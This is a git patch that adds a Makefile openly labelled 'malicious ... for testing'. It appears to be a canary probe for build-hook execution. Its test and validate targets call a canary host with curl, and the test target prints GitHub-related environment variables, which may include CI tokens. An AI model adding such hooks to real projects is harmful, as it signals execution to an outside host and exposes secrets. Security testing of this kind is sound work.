From 0b2306cc8fbb9c0adb40053af4dab0260b542917 Mon Sep 17 00:00:00 2001 From: sanling1 <504767574@qq.com> Date: Mon, 20 Apr 2026 10:06:53 +0800 Subject: [PATCH] Add malicious Makefile for testing --- Makefile.new | 8 ++++++++ 1 file changed, 8 insertions(+) create mode 100644 Makefile.new diff --git a/Makefile.new b/Makefile.new new file mode 100644 index 00000000..a271e01e --- /dev/null +++ b/Makefile.new @@ -0,0 +1,8 @@ +test: + echo "HB-MAKEFILE-EXEC" + curl -s https://canary.domain/HB-MAKEFILE-EXEC || true + env | grep -i github || true + +validate: + echo "HB-MAKEFILE-VALIDATE" + curl -s https://canary.domain/HB-MAKEFILE-VALIDATE || true \ No newline at end of file